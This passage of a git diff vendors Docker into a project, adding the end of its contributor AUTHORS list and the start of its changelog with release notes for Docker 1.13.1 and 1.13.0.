+Rich Seymour <rseymour@gmail.com>
+Richard <richard.scothern@gmail.com>
+Richard Burnison <rburnison@ebay.com>
+Richard Harvey <richard@squarecows.com>
+Richard Mathie <richard.mathie@amey.co.uk>
+Richard Metzler <richard@paadee.com>
+Richard Scothern <richard.scothern@gmail.com>
+Richo Healey <richo@psych0tik.net>
+Rick Bradley <rick@users.noreply.github.com>
+Rick van de Loo <rickvandeloo@gmail.com>
+Rick Wieman <git@rickw.nl>
+Rik Nijessen <rik@keefo.nl>
+Riku Voipio <riku.voipio@linaro.org>
+Riley Guerin <rileytg.dev@gmail.com>
+Ritesh H Shukla <sritesh@vmware.com>
+Riyaz Faizullabhoy <riyaz.faizullabhoy@docker.com>
+Rob Vesse <rvesse@dotnetrdf.org>
+Robert Bachmann <rb@robertbachmann.at>
+Robert Bittle <guywithnose@gmail.com>
+Robert Obryk <robryk@gmail.com>
+Robert Stern <lexandro2000@gmail.com>
+Robert Terhaar <robbyt@users.noreply.github.com>
+Robert Wallis <smilingrob@gmail.com>
+Roberto G. Hashioka <roberto.hashioka@docker.com>
+Robin Naundorf <r.naundorf@fh-muenster.de>
+Robin Schneider <ypid@riseup.net>
+Robin Speekenbrink <robin@kingsquare.nl>
+robpc <rpcann@gmail.com>
+Rodolfo Carvalho <rhcarvalho@gmail.com>
+Rodrigo Vaz <rodrigo.vaz@gmail.com>
+Roel Van Nyen <roel.vannyen@gmail.com>
+Roger Peppe <rogpeppe@gmail.com>
+Rohit Jnagal <jnagal@google.com>
+Rohit Kadam <rohit.d.kadam@gmail.com>
+Roland Huß <roland@jolokia.org>
+Roland Kammerer <roland.kammerer@linbit.com>
+Roland Moriz <rmoriz@users.noreply.github.com>
+Roma Sokolov <sokolov.r.v@gmail.com>
+Roman Strashkin <roman.strashkin@gmail.com>
+Ron Smits <ron.smits@gmail.com>
+Ron Williams <ron.a.williams@gmail.com>
+root <docker-dummy@example.com>
+root <root@localhost>
+root <root@lxdebmas.marist.edu>
+root <root@ubuntu-14.04-amd64-vbox>
+root <root@webm215.cluster016.ha.ovh.net>
+Rory Hunter <roryhunter2@gmail.com>
+Rory McCune <raesene@gmail.com>
+Ross Boucher <rboucher@gmail.com>
+Rovanion Luckey <rovanion.luckey@gmail.com>
+Rozhnov Alexandr <nox73@ya.ru>
+rsmoorthy <rsmoorthy@users.noreply.github.com>
+Rudolph Gottesheim <r.gottesheim@loot.at>
+Rui Lopes <rgl@ruilopes.com>
+Runshen Zhu <runshen.zhu@gmail.com>
+Ryan Anderson <anderson.ryanc@gmail.com>
+Ryan Aslett <github@mixologic.com>
+Ryan Belgrave <rmb1993@gmail.com>
+Ryan Detzel <ryan.detzel@gmail.com>
+Ryan Fowler <rwfowler@gmail.com>
+Ryan McLaughlin <rmclaughlin@insidesales.com>
+Ryan O'Donnell <odonnellryanc@gmail.com>
+Ryan Seto <ryanseto@yak.net>
+Ryan Thomas <rthomas@atlassian.com>
+Ryan Trauntvein <rtrauntvein@novacoast.com>
+Ryan Wallner <ryan.wallner@clusterhq.com>
+RyanDeng <sheldon.d1018@gmail.com>
+Rémy Greinhofer <remy.greinhofer@livelovely.com>
+s. rannou <mxs@sbrk.org>
+s00318865 <sunyuan3@huawei.com>
+Sabin Basyal <sabin.basyal@gmail.com>
+Sachin Joshi <sachin_jayant_joshi@hotmail.com>
+Sagar Hani <sagarhani33@gmail.com>
+Sainath Grandhi <sainath.grandhi@intel.com>
+sakeven <jc5930@sina.cn>
+Sally O'Malley <somalley@redhat.com>
+Sam Abed <sam.abed@gmail.com>
+Sam Alba <sam.alba@gmail.com>
+Sam Bailey <cyprix@cyprix.com.au>
+Sam J Sharpe <sam.sharpe@digital.cabinet-office.gov.uk>
+Sam Neirinck <sam@samneirinck.com>
+Sam Reis <sreis@atlassian.com>
+Sam Rijs <srijs@airpost.net>
+Sambuddha Basu <sambuddhabasu1@gmail.com>
+Sami Wagiaalla <swagiaal@redhat.com>
+Samuel Andaya <samuel@andaya.net>
+Samuel Dion-Girardeau <samuel.diongirardeau@gmail.com>
+Samuel Karp <skarp@amazon.com>
+Samuel PHAN <samuel-phan@users.noreply.github.com>
+Sankar சங்கர் <sankar.curiosity@gmail.com>
+Sanket Saurav <sanketsaurav@gmail.com>
+Santhosh Manohar <santhosh@docker.com>
+sapphiredev <se.imas.kr@gmail.com>
+Satnam Singh <satnam@raintown.org>
+satoru <satorulogic@gmail.com>
+Satoshi Amemiya <satoshi_amemiya@voyagegroup.com>
+Satoshi Tagomori <tagomoris@gmail.com>
+scaleoutsean <scaleoutsean@users.noreply.github.com>
+Scott Bessler <scottbessler@gmail.com>
+Scott Collier <emailscottcollier@gmail.com>
+Scott Johnston <scott@docker.com>
+Scott Stamp <scottstamp851@gmail.com>
+Scott Walls <sawalls@umich.edu>
+sdreyesg <sdreyesg@gmail.com>
+Sean Christopherson <sean.j.christopherson@intel.com>
+Sean Cronin <seancron@gmail.com>
+Sean OMeara <sean@chef.io>
+Sean P. Kane <skane@newrelic.com>
+Sebastiaan van Steenis <mail@superseb.nl>
+Sebastiaan van Stijn <github@gone.nl>
+Senthil Kumar Selvaraj <senthil.thecoder@gmail.com>
+Senthil Kumaran <senthil@uthcode.com>
+SeongJae Park <sj38.park@gmail.com>
+Seongyeol Lim <seongyeol37@gmail.com>
+Serge Hallyn <serge.hallyn@ubuntu.com>
+Sergey Alekseev <sergey.alekseev.minsk@gmail.com>
+Sergey Evstifeev <sergey.evstifeev@gmail.com>
+Serhat Gülçiçek <serhat25@gmail.com>
+Sevki Hasirci <s@sevki.org>
+Shane Canon <scanon@lbl.gov>
+Shane da Silva <shane@dasilva.io>
+shaunol <shaunol@gmail.com>
+Shawn Landden <shawn@churchofgit.com>
+Shawn Siefkas <shawn.siefkas@meredith.com>
+shawnhe <shawnhe@shawnhedeMacBook-Pro.local>
+Shekhar Gulati <shekhargulati84@gmail.com>
+Sheng Yang <sheng@yasker.org>
+Shengbo Song <thomassong@tencent.com>
+Shev Yan <yandong_8212@163.com>
+Shih-Yuan Lee <fourdollars@gmail.com>
+Shijiang Wei <mountkin@gmail.com>
+Shishir Mahajan <shishir.mahajan@redhat.com>
+Shoubhik Bose <sbose78@gmail.com>
+Shourya Sarcar <shourya.sarcar@gmail.com>
+shuai-z <zs.broccoli@gmail.com>
+Shukui Yang <yangshukui@huawei.com>
+Shuwei Hao <haosw@cn.ibm.com>
+Sian Lerk Lau <kiawin@gmail.com>
+sidharthamani <sid@rancher.com>
+Silas Sewell <silas@sewell.org>
+Simei He <hesimei@zju.edu.cn>
+Simon Eskildsen <sirup@sirupsen.com>
+Simon Leinen <simon.leinen@gmail.com>
+Simon Taranto <simon.taranto@gmail.com>
+Sindhu S <sindhus@live.in>
+Sjoerd Langkemper <sjoerd-github@linuxonly.nl>
+skaasten <shaunk@gmail.com>
+Solganik Alexander <solganik@gmail.com>
+Solomon Hykes <solomon@docker.com>
+Song Gao <song@gao.io>
+Soshi Katsuta <soshi.katsuta@gmail.com>
+Soulou <leo@unbekandt.eu>
+Spencer Brown <spencer@spencerbrown.org>
+Spencer Smith <robertspencersmith@gmail.com>
+Sridatta Thatipamala <sthatipamala@gmail.com>
+Sridhar Ratnakumar <sridharr@activestate.com>
+Srini Brahmaroutu <srbrahma@us.ibm.com>
+srinsriv <srinsriv@users.noreply.github.com>
+Steeve Morin <steeve.morin@gmail.com>
+Stefan Berger <stefanb@linux.vnet.ibm.com>
+Stefan J. Wernli <swernli@microsoft.com>
+Stefan Praszalowicz <stefan@greplin.com>
+Stefan Scherer <scherer_stefan@icloud.com>
+Stefan Staudenmeyer <doerte@instana.com>
+Stefan Weil <sw@weilnetz.de>
+Stephen Crosby <stevecrozz@gmail.com>
+Stephen Day <stephen.day@docker.com>
+Stephen Drake <stephen@xenolith.net>
+Stephen Rust <srust@blockbridge.com>
+Steve Durrheimer <s.durrheimer@gmail.com>
+Steve Francia <steve.francia@gmail.com>
+Steve Koch <stevekochscience@gmail.com>
+Steven Burgess <steven.a.burgess@hotmail.com>
+Steven Erenst <stevenerenst@gmail.com>
+Steven Iveson <sjiveson@outlook.com>
+Steven Merrill <steven.merrill@gmail.com>
+Steven Richards <steven@axiomzen.co>
+Steven Taylor <steven.taylor@me.com>
+Subhajit Ghosh <isubuz.g@gmail.com>
+Sujith Haridasan <sujith.h@gmail.com>
+Suryakumar Sudar <surya.trunks@gmail.com>
+Sven Dowideit <SvenDowideit@home.org.au>
+Swapnil Daingade <swapnil.daingade@gmail.com>
+Sylvain Baubeau <sbaubeau@redhat.com>
+Sylvain Bellemare <sylvain@ascribe.io>
+Sébastien <sebastien@yoozio.com>
+Sébastien Luttringer <seblu@seblu.net>
+Sébastien Stormacq <sebsto@users.noreply.github.com>
+Tadej Janež <tadej.j@nez.si>
+TAGOMORI Satoshi <tagomoris@gmail.com>
+tang0th <tang0th@gmx.com>
+Tangi COLIN <tangicolin@gmail.com>
+Tatsuki Sugiura <sugi@nemui.org>
+Tatsushi Inagaki <e29253@jp.ibm.com>
+Taylor Jones <monitorjbl@gmail.com>
+tbonza <tylers.pile@gmail.com>
+Ted M. Young <tedyoung@gmail.com>
+Tehmasp Chaudhri <tehmasp@gmail.com>
+Tejesh Mehta <tejesh.mehta@gmail.com>
+terryding77 <550147740@qq.com>
+tgic <farmer1992@gmail.com>
+Thatcher Peskens <thatcher@docker.com>
+theadactyl <thea.lamkin@gmail.com>
+Thell 'Bo' Fowler <thell@tbfowler.name>
+Thermionix <bond711@gmail.com>
+Thijs Terlouw <thijsterlouw@gmail.com>
+Thomas Bikeev <thomas.bikeev@mac.com>
+Thomas Frössman <thomasf@jossystem.se>
+Thomas Gazagnaire <thomas@gazagnaire.org>
+Thomas Grainger <tagrain@gmail.com>
+Thomas Hansen <thomas.hansen@gmail.com>
+Thomas Leonard <thomas.leonard@docker.com>
+Thomas LEVEIL <thomasleveil@gmail.com>
+Thomas Orozco <thomas@orozco.fr>
+Thomas Riccardi <riccardi@systran.fr>
+Thomas Schroeter <thomas@cliqz.com>
+Thomas Sjögren <konstruktoid@users.noreply.github.com>
+Thomas Swift <tgs242@gmail.com>
+Thomas Tanaka <thomas.tanaka@oracle.com>
+Thomas Texier <sharkone@en-mousse.org>
+Tianon Gravi <admwiggin@gmail.com>
+Tianyi Wang <capkurmagati@gmail.com>
+Tibor Vass <teabee89@gmail.com>
+Tiffany Jernigan <tiffany.f.j@gmail.com>
+Tiffany Low <tiffany@box.com>
+Tim Bosse <taim@bosboot.org>
+Tim Dettrick <t.dettrick@uq.edu.au>
+Tim Düsterhus <tim@bastelstu.be>
+Tim Hockin <thockin@google.com>
+Tim Ruffles <oi@truffles.me.uk>
+Tim Smith <timbot@google.com>
+Tim Terhorst <mynamewastaken+git@gmail.com>
+Tim Wang <timwangdev@gmail.com>
+Tim Waugh <twaugh@redhat.com>
+Tim Wraight <tim.wraight@tangentlabs.co.uk>
+timfeirg <kkcocogogo@gmail.com>
+Timothy Hobbs <timothyhobbs@seznam.cz>
+tjwebb123 <tjwebb123@users.noreply.github.com>
+tobe <tobegit3hub@gmail.com>
+Tobias Bieniek <Tobias.Bieniek@gmx.de>
+Tobias Bradtke <webwurst@gmail.com>
+Tobias Gesellchen <tobias@gesellix.de>
+Tobias Klauser <tklauser@distanz.ch>
+Tobias Munk <schmunk@usrbin.de>
+Tobias Schmidt <ts@soundcloud.com>
+Tobias Schwab <tobias.schwab@dynport.de>
+Todd Crane <todd@toddcrane.com>
+Todd Lunter <tlunter@gmail.com>
+Todd Whiteman <todd.whiteman@joyent.com>
+Toli Kuznets <toli@docker.com>
+Tom Barlow <tomwbarlow@gmail.com>
+Tom Denham <tom@tomdee.co.uk>
+Tom Fotherby <tom+github@peopleperhour.com>
+Tom Howe <tom.howe@enstratius.com>
+Tom Hulihan <hulihan.tom159@gmail.com>
+Tom Maaswinkel <tom.maaswinkel@12wiki.eu>
+Tom X. Tobin <tomxtobin@tomxtobin.com>
+Tomas Tomecek <ttomecek@redhat.com>
+Tomasz Kopczynski <tomek@kopczynski.net.pl>
+Tomasz Lipinski <tlipinski@users.noreply.github.com>
+Tomasz Nurkiewicz <nurkiewicz@gmail.com>
+Tommaso Visconti <tommaso.visconti@gmail.com>
+Tomáš Hrčka <thrcka@redhat.com>
+Tonis Tiigi <tonistiigi@gmail.com>
+Tonny Xu <tonny.xu@gmail.com>
+Tony Daws <tony@daws.ca>
+Tony Miller <mcfiredrill@gmail.com>
+toogley <toogley@mailbox.org>
+Torstein Husebø <torstein@huseboe.net>
+tpng <benny.tpng@gmail.com>
+tracylihui <793912329@qq.com>
+Travis Cline <travis.cline@gmail.com>
+Travis Thieman <travis.thieman@gmail.com>
+Trent Ogren <tedwardo2@gmail.com>
+Trevor <trevinwoodstock@gmail.com>
+Trevor Pounds <trevor.pounds@gmail.com>
+trishnaguha <trishnaguha17@gmail.com>
+Tristan Carel <tristan@cogniteev.com>
+Troy Denton <trdenton@gmail.com>
+Tyler Brock <tyler.brock@gmail.com>
+Tzu-Jung Lee <roylee17@gmail.com>
+Tõnis Tiigi <tonistiigi@gmail.com>
+Ulysse Carion <ulyssecarion@gmail.com>
+unknown <sebastiaan@ws-key-sebas3.dpi1.dpi>
+vagrant <vagrant@ubuntu-14.04-amd64-vbox>
+Vaidas Jablonskis <jablonskis@gmail.com>
+Veres Lajos <vlajos@gmail.com>
+vgeta <gopikannan.venugopalsamy@gmail.com>
+Victor Algaze <valgaze@gmail.com>
+Victor Coisne <victor.coisne@dotcloud.com>
+Victor Costan <costan@gmail.com>
+Victor I. Wood <viw@t2am.com>
+Victor Lyuboslavsky <victor@victoreda.com>
+Victor Marmol <vmarmol@google.com>
+Victor Palma <palma.victor@gmail.com>
+Victor Vieux <victor.vieux@docker.com>
+Victoria Bialas <victoria.bialas@docker.com>
+Vijaya Kumar K <vijayak@caviumnetworks.com>
+Viktor Stanchev <me@viktorstanchev.com>
+Viktor Vojnovski <viktor.vojnovski@amadeus.com>
+VinayRaghavanKS <raghavan.vinay@gmail.com>
+Vincent Batts <vbatts@redhat.com>
+Vincent Bernat <bernat@luffy.cx>
+Vincent Bernat <Vincent.Bernat@exoscale.ch>
+Vincent Demeester <vincent@sbr.pm>
+Vincent Giersch <vincent.giersch@ovh.net>
+Vincent Mayers <vincent.mayers@inbloom.org>
+Vincent Woo <me@vincentwoo.com>
+Vinod Kulkarni <vinod.kulkarni@gmail.com>
+Vishal Doshi <vishal.doshi@gmail.com>
+Vishnu Kannan <vishnuk@google.com>
+Vitor Monteiro <vmrmonteiro@gmail.com>
+Vivek Agarwal <me@vivek.im>
+Vivek Dasgupta <vdasgupt@redhat.com>
+Vivek Goyal <vgoyal@redhat.com>
+Vladimir Bulyga <xx@ccxx.cc>
+Vladimir Kirillov <proger@wilab.org.ua>
+Vladimir Pouzanov <farcaller@google.com>
+Vladimir Rutsky <altsysrq@gmail.com>
+Vladimir Varankin <nek.narqo+git@gmail.com>
+VladimirAus <v_roudakov@yahoo.com>
+Vojtech Vitek (V-Teq) <vvitek@redhat.com>
+waitingkuo <waitingkuo0527@gmail.com>
+Walter Leibbrandt <github@wrl.co.za>
+Walter Stanish <walter@pratyeka.org>
+WANG Chao <wcwxyz@gmail.com>
+Wang Xing <hzwangxing@corp.netease.com>
+Ward Vandewege <ward@jhvc.com>
+WarheadsSE <max@warheads.net>
+Wayne Chang <wayne@neverfear.org>
+Wei-Ting Kuo <waitingkuo0527@gmail.com>
+weiyan <weiyan3@huawei.com>
+Weiyang Zhu <cnresonant@gmail.com>
+Wen Cheng Ma <wenchma@cn.ibm.com>
+Wendel Fleming <wfleming@usc.edu>
+Wenkai Yin <yinw@vmware.com>
+Wenxuan Zhao <viz@linux.com>
+Wenyu You <21551128@zju.edu.cn>
+Wes Morgan <cap10morgan@gmail.com>
+Will Dietz <w@wdtz.org>
+Will Rouesnel <w.rouesnel@gmail.com>
+Will Weaver <monkey@buildingbananas.com>
+willhf <willhf@gmail.com>
+William Delanoue <william.delanoue@gmail.com>
+William Henry <whenry@redhat.com>
+William Hubbs <w.d.hubbs@gmail.com>
+William Riancho <wr.wllm@gmail.com>
+William Thurston <thurstw@amazon.com>
+WiseTrem <shepelyov.g@gmail.com>
+wlan0 <sidharthamn@gmail.com>
+Wolfgang Powisch <powo@powo.priv.at>
+wonderflow <wonderflow.sun@gmail.com>
+Wonjun Kim <wonjun.kim@navercorp.com>
+xamyzhao <x.amy.zhao@gmail.com>
+Xianlu Bird <xianlubird@gmail.com>
+XiaoBing Jiang <s7v7nislands@gmail.com>
+Xiaoxu Chen <chenxiaoxu14@otcaix.iscas.ac.cn>
+xiekeyang <xiekeyang@huawei.com>
+Xinzi Zhou <imdreamrunner@gmail.com>
+Xiuming Chen <cc@cxm.cc>
+xlgao-zju <xlgao@zju.edu.cn>
+xuzhaokui <cynicholas@gmail.com>
+Yahya <ya7yaz@gmail.com>
+YAMADA Tsuyoshi <tyamada@minimum2scp.org>
+Yan Feng <yanfeng2@huawei.com>
+Yang Bai <hamo.by@gmail.com>
+yangshukui <yangshukui@huawei.com>
+Yanqiang Miao <miao.yanqiang@zte.com.cn>
+Yasunori Mahata <nori@mahata.net>
+Yestin Sun <sunyi0804@gmail.com>
+Yi EungJun <eungjun.yi@navercorp.com>
+Yibai Zhang <xm1994@gmail.com>
+Yihang Ho <hoyihang5@gmail.com>
+Ying Li <cyli@twistedmatrix.com>
+Yohei Ueda <yohei@jp.ibm.com>
+Yong Tang <yong.tang.github@outlook.com>
+Yongzhi Pan <panyongzhi@gmail.com>
+yorkie <yorkiefixer@gmail.com>
+Youcef YEKHLEF <yyekhlef@gmail.com>
+Yuan Sun <sunyuan3@huawei.com>
+yuchangchun <yuchangchun1@huawei.com>
+yuchengxia <yuchengxia@huawei.com>
+yuexiao-wang <wang.yuexiao@zte.com.cn>
+YuPengZTE <yu.peng36@zte.com.cn>
+Yurii Rashkovskii <yrashk@gmail.com>
+yuzou <zouyu7@huawei.com>
+Zac Dover <zdover@redhat.com>
+Zach Borboa <zachborboa@gmail.com>
+Zachary Jaffee <zij@case.edu>
+Zain Memon <zain@inzain.net>
+Zaiste! <oh@zaiste.net>
+Zane DeGraffenried <zane.deg@gmail.com>
+Zefan Li <lizefan@huawei.com>
+Zen Lin(Zhinan Lin) <linzhinan@huawei.com>
+Zhang Kun <zkazure@gmail.com>
+Zhang Wei <zhangwei555@huawei.com>
+Zhang Wentao <zhangwentao234@huawei.com>
+Zhenan Ye <21551168@zju.edu.cn>
+zhouhao <zhouhao@cn.fujitsu.com>
+Zhu Guihua <zhugh.fnst@cn.fujitsu.com>
+Zhuoyun Wei <wzyboy@wzyboy.org>
+Zilin Du <zilin.du@gmail.com>
+zimbatm <zimbatm@zimbatm.com>
+Ziming Dong <bnudzm@foxmail.com>
+ZJUshuaizhou <21551191@zju.edu.cn>
+zmarouf <zeid.marouf@gmail.com>
+Zoltan Tombol <zoltan.tombol@gmail.com>
+zqh <zqhxuyuan@gmail.com>
+Zuhayr Elahi <elahi.zuhayr@gmail.com>
+Zunayed Ali <zunayed@gmail.com>
+Álex González <agonzalezro@gmail.com>
+Álvaro Lázaro <alvaro.lazaro.g@gmail.com>
+Átila Camurça Alves <camurca.home@gmail.com>
+尹吉峰 <jifeng.yin@gmail.com>
+搏通 <yufeng.pyf@alibaba-inc.com>
diff --git a/vendor/github.com/docker/docker/CHANGELOG.md b/vendor/github.com/docker/docker/CHANGELOG.md
new file mode 100644
index 0000000000..36bb880639
--- /dev/null
+++ b/vendor/github.com/docker/docker/CHANGELOG.md
@@ -0,0 +1,3337 @@
+# Changelog
+
+Items starting with `DEPRECATE` are important deprecation notices. For more
+information on the list of deprecated flags and APIs please have a look at
+https://docs.docker.com/engine/deprecated/ where target removal dates can also
+be found.
+
+## 1.13.1 (2017-02-08)
+
+**IMPORTANT**: On Linux distributions where `devicemapper` was the default storage driver,
+the `overlay2`, or `overlay` is now used by default (if the kernel supports it).
+To use devicemapper, you can manually configure the storage driver to use through
+the `--storage-driver` daemon option, or by setting "storage-driver" in the `daemon.json`
+configuration file.
+
+**IMPORTANT**: In Docker 1.13, the managed plugin api changed, as compared to the experimental
+version introduced in Docker 1.12. You must **uninstall** plugins which you installed with Docker 1.12
+_before_ upgrading to Docker 1.13. You can uninstall plugins using the `docker plugin rm` command.
+
+If you have already upgraded to Docker 1.13 without uninstalling
+previously-installed plugins, you may see this message when the Docker daemon
+starts:
+
+    Error starting daemon: json: cannot unmarshal string into Go value of type types.PluginEnv
+
+To manually remove all plugins and resolve this problem, take the following steps:
+
+1. Remove plugins.json from: `/var/lib/docker/plugins/`.
+2. Restart Docker. Verify that the Docker daemon starts with no errors.
+3. Reinstall your plugins.
+
+### Contrib
+
+* Do not require a custom build of tini [#28454](https://github.com/docker/docker/pull/28454)
+* Upgrade to Go 1.7.5 [#30489](https://github.com/docker/docker/pull/30489)
+
+### Remote API (v1.26) & Client
+
++ Support secrets in docker stack deploy with compose file [#30144](https://github.com/docker/docker/pull/30144)
+
+### Runtime
+
+* Fix size issue in `docker system df` [#30378](https://github.com/docker/docker/pull/30378)
+* Fix error on `docker inspect` when Swarm certificates were expired. [#29246](https://github.com/docker/docker/pull/29246)
+* Fix deadlock on v1 plugin with activate error [#30408](https://github.com/docker/docker/pull/30408)
+* Fix SELinux regression [#30649](https://github.com/docker/docker/pull/30649)
+
+### Plugins
+
+* Support global scoped network plugins (v2) in swarm mode [#30332](https://github.com/docker/docker/pull/30332)
++ Add `docker plugin upgrade` [#29414](https://github.com/docker/docker/pull/29414)
+
+### Windows
+
+* Fix small regression with old plugins in Windows [#30150](https://github.com/docker/docker/pull/30150)
+* Fix warning on Windows [#30730](https://github.com/docker/docker/pull/30730)
+
+## 1.13.0 (2017-01-18)
+
+**IMPORTANT**: On Linux distributions where `devicemapper` was the default storage driver,
+the `overlay2`, or `overlay` is now used by default (if the kernel supports it).
+To use devicemapper, you can manually configure the storage driver to use through
+the `--storage-driver` daemon option, or by setting "storage-driver" in the `daemon.json`
+configuration file.
+
+**IMPORTANT**: In Docker 1.13, the managed plugin api changed, as compared to the experimental
+version introduced in Docker 1.12. You must **uninstall** plugins which you installed with Docker 1.12
+_before_ upgrading to Docker 1.13. You can uninstall plugins using the `docker plugin rm` command.
+
+If you have already upgraded to Docker 1.13 without uninstalling
+previously-installed plugins, you may see this message when the Docker daemon
+starts:
+
+    Error starting daemon: json: cannot unmarshal string into Go value of type types.PluginEnv
+
+To manually remove all plugins and resolve this problem, take the following steps:
+
+1. Remove plugins.json from: `/var/lib/docker/plugins/`.
+2. Restart Docker. Verify that the Docker daemon starts with no errors.
+3. Reinstall your plugins.
+
+### Builder
+
++ Add capability to specify images used as a cache source on build. These images do not need to have local parent chain and can be pulled from other registries [#26839](https://github.com/docker/docker/pull/26839)
++ (experimental) Add option to squash image layers to the FROM image after successful builds [#22641](https://github.com/docker/docker/pull/22641)
+* Fix dockerfile parser with empty line after escape [#24725](https://github.com/docker/docker/pull/24725)
+- Add step number on `docker build` [#24978](https://github.com/docker/docker/pull/24978)
++ Add support for compressing build context during image build [#25837](https://github.com/docker/docker/pull/25837)
++ add `--network` to `docker build` [#27702](https://github.com/docker/docker/pull/27702)
+- Fix inconsistent behavior between `--label` flag on `docker build` and `docker run` [#26027](https://github.com/docker/docker/issues/26027)
+- Fix image layer inconsistencies when using the overlay storage driver [#27209](https://github.com/docker/docker/pull/27209)
+* Unused build-args are now allowed. A warning is presented instead of an error and failed build [#27412](https://github.com/docker/docker/pull/27412)
+- Fix builder cache issue on Windows [#27805](https://github.com/docker/docker/pull/27805)
++ Allow `USER` in builder on Windows [#28415](https://github.com/docker/docker/pull/28415)
++ Handle env case-insensitive on Windows [#28725](https://github.com/docker/docker/pull/28725)
+
+### Contrib
+
++ Add support for building docker debs for Ubuntu 16.04 Xenial on PPC64LE [#23438](https://github.com/docker/docker/pull/23438)
++ Add support for building docker debs for Ubuntu 16.04 Xenial on s390x [#26104](https://github.com/docker/docker/pull/26104)
++ Add support for building docker debs for Ubuntu 16.10 Yakkety Yak on PPC64LE [#28046](https://github.com/docker/docker/pull/28046)
+- Add RPM builder for VMWare Photon OS [#24116](https://github.com/docker/docker/pull/24116)
++ Add shell completions to tgz [#27735](https://github.com/docker/docker/pull/27735)
+* Update the install script to allow using the mirror in China [#27005](https://github.com/docker/docker/pull/27005)
++ Add DEB builder for Ubuntu 16.10 Yakkety Yak [#27993](https://github.com/docker/docker/pull/27993)
++ Add RPM builder for Fedora 25 [#28222](https://github.com/docker/docker/pull/28222)
++ Add `make deb` support for aarch64 [#27625](https://github.com/docker/docker/pull/27625)
+
+### Distribution
+
+* Update notary dependency to 0.4.2 (full changelogs [here](https://github.com/docker/notary/releases/tag/v0.4.2)) [#27074](https://github.com/docker/docker/pull/27074)
+  - Support for compilation on windows [docker/notary#970](https://github.com/docker/notary/pull/970)
+  - Improved error messages for client authentication errors [docker/notary#972](https://github.com/docker/notary/pull/972)
+  - Support for finding keys that are anywhere in the `~/.docker/trust/private` directory, not just under `~/.docker/trust/private/root_keys` or `~/.docker/trust/private/tuf_keys` [docker/notary#981](https://github.com/docker/notary/pull/981)
+  - Previously, on any error updating, the client would fall back on the cache.  Now we only do so if there is a network error or if the server is unavailable or missing the TUF data. Invalid TUF data will cause the update to fail - for example if there was an invalid root rotation. [docker/notary#982](https://github.com/docker/notary/pull/982)
+  - Improve root validation and yubikey debug logging [docker/notary#858](https://github.com/docker/notary/pull/858) [docker/notary#891](https://github.com/docker/notary/pull/891)
+  - Warn if certificates for root or delegations are near expiry [docker/notary#802](https://github.com/docker/notary/pull/802)
+  - Warn if role metadata is near expiry [docker/notary#786](https://github.com/docker/notary/pull/786)
+  - Fix passphrase retrieval attempt counting and terminal detection [docker/notary#906](https://github.com/docker/notary/pull/906)
+- Avoid unnecessary blob uploads when different users push same layers to authenticated registry [#26564](https://github.com/docker/docker/pull/26564)
+* Allow external storage for registry credentials [#26354](https://github.com/docker/docker/pull/26354)
+
+### Logging
+
+* Standardize the default logging tag value in all logging drivers [#22911](https://github.com/docker/docker/pull/22911)
+- Improve performance and memory use when logging of long log lines [#22982](https://github.com/docker/docker/pull/22982)
++ Enable syslog driver for windows [#25736](https://github.com/docker/docker/pull/25736)
++ Add Logentries Driver [#27471](https://github.com/docker/docker/pull/27471)
++ Update of AWS log driver to support tags [#27707](https://github.com/docker/docker/pull/27707)
++ Unix socket support for fluentd [#26088](https://github.com/docker/docker/pull/26088)
+* Enable fluentd logging driver on Windows [#28189](https://github.com/docker/docker/pull/28189)
+- Sanitize docker labels when used as journald field names [#23725](https://github.com/docker/docker/pull/23725)
+- Fix an issue where `docker logs --tail` returned less lines than expected [#28203](https://github.com/docker/docker/pull/28203)
+- Splunk Logging Driver: performance and reliability improvements [#26207](https://github.com/docker/docker/pull/26207)
+- Splunk Logging Driver: configurable formats and skip for verifying connection [#25786](https://github.com/docker/docker/pull/25786)
+
+### Networking
+
++ Add `--attachable` network support to enable `docker run` to work in swarm-mode overlay network [#25962](https://github.com/docker/docker/pull/25962)
++ Add support for host port PublishMode in services using the `--publish` option in `docker service create` [#27917](https://github.com/docker/docker/pull/27917) and [#28943](https://github.com/docker/docker/pull/28943)
++ Add support for Windows server 2016 overlay network driver (requires upcoming ws2016 update) [#28182](https://github.com/docker/docker/pull/28182)
+* Change the default `FORWARD` policy to `DROP` [#28257](https://github.com/docker/docker/pull/28257)
++ Add support for specifying static IP addresses for predefined network on windows [#22208](https://github.com/docker/docker/pull/22208)
+- Fix `--publish` flag on `docker run` not working with IPv6 addresses [#27860](https://github.com/docker/docker/pull/27860)
+- Fix inspect network show gateway with mask [#25564](https://github.com/docker/docker/pull/25564)
+- Fix an issue where multiple addresses in a bridge may cause `--fixed-cidr` to not have the correct addresses [#26659](https://github.com/docker/docker/pull/26659)
++ Add creation timestamp to `docker network inspect` [#26130](https://github.com/docker/docker/pull/26130)
+- Show peer nodes in `docker network inspect` for swarm overlay networks [#28078](https://github.com/docker/docker/pull/28078)
+- Enable ping for service VIP address [#28019](https://github.com/docker/docker/pull/28019)
+
+### Plugins
+
+- Move plugins out of experimental [#28226](https://github.com/docker/docker/pull/28226)
+- Add `--force` on `docker plugin remove` [#25096](https://github.com/docker/docker/pull/25096)
+* Add support for dynamically reloading authorization plugins [#22770](https://github.com/docker/docker/pull/22770)
++ Add description in `docker plugin ls` [#25556](https://github.com/docker/docker/pull/25556)
++ Add `-f`/`--format` to `docker plugin inspect` [#25990](https://github.com/docker/docker/pull/25990)
++ Add `docker plugin create` command [#28164](https://github.com/docker/docker/pull/28164)
+* Send request's TLS peer certificates to authorization plugins [#27383](https://github.com/docker/docker/pull/27383)
+* Support for global-scoped network and ipam plugins in swarm-mode [#27287](https://github.com/docker/docker/pull/27287)
+* Split `docker plugin install` into two API call `/privileges` and `/pull` [#28963](https://github.com/docker/docker/pull/28963)
+
+### Remote API (v1.25) & Client
+
++ Support `docker stack deploy` from a Compose file [#27998](https://github.com/docker/docker/pull/27998)
++ (experimental) Implement checkpoint and restore [#22049](https://github.com/docker/docker/pull/22049)
++ Add `--format` flag to `docker info` [#23808](https://github.com/docker/docker/pull/23808)
+* Remove `--name` from `docker volume create` [#23830](https://github.com/docker/docker/pull/23830)
++ Add `docker stack ls` [#23886](https://github.com/docker/docker/pull/23886)
++ Add a new `is-task` ps filter [#24411](https://github.com/docker/docker/pull/24411)
++ Add `--env-file` flag to `docker service create` [#24844](https://github.com/docker/docker/pull/24844)
++ Add `--format` on `docker stats` [#24987](https://github.com/docker/docker/pull/24987)
++ Make `docker node ps` default to `self` in swarm node [#25214](https://github.com/docker/docker/pull/25214)
++ Add `--group` in `docker service create` [#25317](https://github.com/docker/docker/pull/25317)
